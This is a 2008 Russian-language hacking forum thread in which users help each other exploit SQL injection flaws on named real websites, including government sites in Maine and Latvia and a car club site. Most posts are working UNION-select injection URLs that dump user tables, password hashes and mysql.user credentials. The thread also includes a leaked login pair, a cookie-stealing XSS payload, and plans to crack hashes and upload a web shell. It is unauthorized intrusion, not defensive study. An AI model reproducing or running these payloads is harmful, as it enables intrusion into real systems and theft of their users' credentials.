SQL непохек

Тема в разделе "Поиск уязвимостей", создана пользователем xeran, 1 сен 2008.

  1. NetSky
    NetSky Guest
    +1
    Hookman, почитай мою статью...
    https://xaker.name/forvb/showthread.php?t=12495
    Тебе поможет последняя тема о булевой истине и лже.
    Не обязательно что ответ сервера будет адекватный. Явного вывода может не быть, а может не быть и вообще.
     
    30 окт 2008
  2. Хел
    Хел Guest
    паследнийе китайсскайе прЫдупреждение особо непонятливым личностям задающим вопросы не в той теме...следующий кто напишет чтот-бан.
     
    30 окт 2008
  3. ozs
    ozs Guest
    Что скажите, ваше мнение?
     
    2 ноя 2008
  4. wriwel
    wriwel Guest
    ozs,
    UnHidden Content:
    http://www.shoko.ru/index.php?page_id=2/ ?=))
    жестокая ошибка("парам.парам.пампам...").. такое ощущение что эта 2/ подставляется несколько раз или там модуль какой-то подключен. В инете покопался, ничего не нашел.. кроме как на хайдовой ссылке такой ошибки больше нигде не видел.
    Там если ввести вместо слеша букву или слова выскакивает еррор: Unknown column '2t' in 'on clause'.. я хз что там сделалть ибо кавычка фильтруется а она нужна
     
    2 ноя 2008
  5. Ap0str0F
    Ap0str0F Guest
    И в чём непохек?..
     
    27 ноя 2008
  6. Hookman
    Hookman Guest
    Кол-во полей вроди как подобрал, а вывода не видно:confused:
    Код:
    http://www.maineservicecommission.gov/reports/archive.php?group=Administrative%20Staff%20Reports'+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50/*
    
     
    8 дек 2008
  7. b3
    b3 Guest
    Hookman,
    blind sql inj
     
    8 дек 2008
  8. Ap0str0F
    Ap0str0F Guest
    Hookman, как-то ты странно подбирал...
    Код:
    http://www.maineservicecommission.gov/reports/archive.php?group=-Administrative%20Staff%20Reports'+union+select+1,2,3,concat_ws(0x3b,%20user(),database(),version()),5/*
    ..
     
    9 дек 2008
    1 человеку нравится это.
  9. NetSky
    NetSky Guest
    Вот както встретился с кодировкой "iso-8859-1" при проведении слк-инж, тогда мне особо "не пекло" что-то извлечь, занят был, а со скулей просто помочь попросили... Я не стал сильно долбаться, когда вроде все прошло норм, а как дело подошло к выводу версии, например, стало понятно что используется "нестандартная" кодировка, а именно "iso-8859-1". Сколько искал, так и не нашел как она "выглядит", вернее сказать называется в майскл-базе, у себя в базе лазил, ее не нашел... По гуглу лазил, тоже не нашел... Сейчас попался англоязычный сайт, тот был на португальском вроде, теперь вот надобность реальная, при том что получается, кодировка не такая уж и нераспространенная, так что прошу помочь знающих людей) сча еще пойду гляну в другой базе спод денвера.
     
    9 дек 2008
  10. Hookman
    Hookman Guest
    :confused:Ни ошибки ни вывода
    Код:
    http://www.e30club.ru/index.php?id=-3+union+select+1,concat(login,password),3,4,5,6,7+from+ds_e30club_users+limit+1,1/*
    
     
    12 дек 2008
  11. NetSky
    NetSky Guest
    Код:
    http://www.e30club.ru/index.php?id=1+and+0+union+select+1,count(login),3,4,5,6,7+from+ds_e30club_users/*
    ибо она пустая), хэккер)
     
    12 дек 2008
    1 человеку нравится это.
  12. Ap0str0F
    Ap0str0F Guest
    2Hookman, там есть табла 'ds_bmwstyle_users', в ней поля id,name,login,password, всего 6 записей, ну и конечно форум:
    Код:
    http://www.e30club.ru/index.php?id=-163+union+select+1,concat_ws(0x3b,user(),database(),version(),column_name),3,4,5,6,7+from+information_schema.columns+where+table_name=0x736d665f6d656d62657273+limit+0,1
    Пароли там хешируются так sha1($username.$pass)..
     
    13 дек 2008
    1 человеку нравится это.
  13. tuy
    tuy Новичок
    Симпатии:
    0
    Нащёл вот что :
    _http://www.am.gov.lv/en/?id=238+union+select+1/*
    причём число столбцов 1 (О_о первый раз такое вижу=), проерял даже ORDER+BY-всё равно 1)

    но дело то в том что "1" нигде на странице нету пробовал подставлять USER(),VERSION() - нихрена (
    зато возможна пассивная XSS
    _http://www.am.gov.lv/en/?id=238+%3Cscript%3Ealert(document.cookie)%3C/script%3E =))

    вот ещё один запрос, тут уже 2 столбца но такаяже хрень(
    _http://www.am.gov.lv/en/emaillink/?rid=238+union+select+1,2/*
    что делать, подскажите...

    P.S.: я пытался посимвольный перебор использовать но
    _http://www.am.gov.lv/en/?id=238+and+substring(version(),1,1)=9-- и
    _http://www.am.gov.lv/en/?id=238+and+1=9--
    не выдают ошибку! значит существует какаято проблема с "AND" или я ошибаюсь?
    Жду.
     
    Последнее редактирование модератором: 13 дек 2008
    13 дек 2008
  14. NetSky
    NetSky Guest
    tuy,
    Код:
    http://www.am.gov.lv/en/emaillink/?rid=-238+union+select+1,version()/*
    Добавлено через 17 минут
    Код:
    http://www.am.gov.lv/en/emaillink/?rid=-238+union+select+1,concat_ws(0x3a,user,password)+from+mysql.user/*
    вот те) кодировка - mysql
     
    Последнее редактирование модератором: 13 дек 2008
    13 дек 2008
    1 человеку нравится это.
  15. tuy
    tuy Новичок
    Симпатии:
    0
    =)) всё как всегда просто) только теперь ещё вопросик как можно подключиться к их базе (root'ом) анонимно и какой прогой лучше? (просто я ещё ни разу так не делал=))
     
    13 дек 2008
  16. Hookman
    Hookman Guest
    А Вы молодой человек уже хеш сбрутили? Путь к админке нашли?
     
    13 дек 2008
  17. tuy
    tuy Новичок
    Симпатии:
    0
    ну хеш то ещё нет, но зачем мне путь к админке если у меня пас из mysql.user, я так понимаю с этими данными мне нужно напрямую к mysql подключаться или же я опять туплю?)
     
    13 дек 2008
  18. NetSky
    NetSky Guest
    к какой майскл? каким образом ты собираешься к ней подключаться не зная пути к ней??? А че там подключаться то "анонимно", обычный фрикап + браузер или любой другой соксификатор. Ты сперва определись что тебе нужно и хэш сбрути для начала. Я пробежался скриптом, ничего особого там не нашел, а серв ваще ся странно ведет... Видимо стоит фаер. Так что советую поискать чего другое...
     
    13 дек 2008
  19. Hookman
    Hookman Guest
    В таблице mysql.user только 3 записи, скорее всего это всё администрация. А хеш в любом случае придётся брутить, пока не сбрутил
    ещё рано о чём то думать...
    Код:
    http://www.am.gov.lv/en/emaillink/?rid=-238+union+select+1,concat_ws(0x3a,user,password)+from+mysql.user+limit+2,1/* 
    http://www.am.gov.lv/en/emaillink/?rid=-238+union+select+1,concat_ws(0x3a,user,password)+from+mysql.user+limit+3,1/*
    
     
    13 дек 2008
  20. tuy
    tuy Новичок
    Симпатии:
    0
    ну изните я же сказал что ещё не разу такое не делал вот и не знаю как и что сейчас пытаюсь подобрать имя админской таблицы, но нех не выходит, load_file() работает значит можно попробовать шелл залить через инъекцию , щас и это попробую

    Добавлено через 18 минут
    _http://www.am.gov.lv/en/emaillink/?rid=-238+union+select+1,concat_ws(0x3a,user,password)+from+mysql.user+limit+2,1/*
    dumper:dumper

    Добавлено через 1 час 18 минут
    путь раскрыть не получается( все ошибки однотипные и путь там не указывается(
    и в гугле ни чё толкогого нету(

    |||ссылки не активные!!
     
    Последнее редактирование модератором: 13 дек 2008
    13 дек 2008
Загрузка...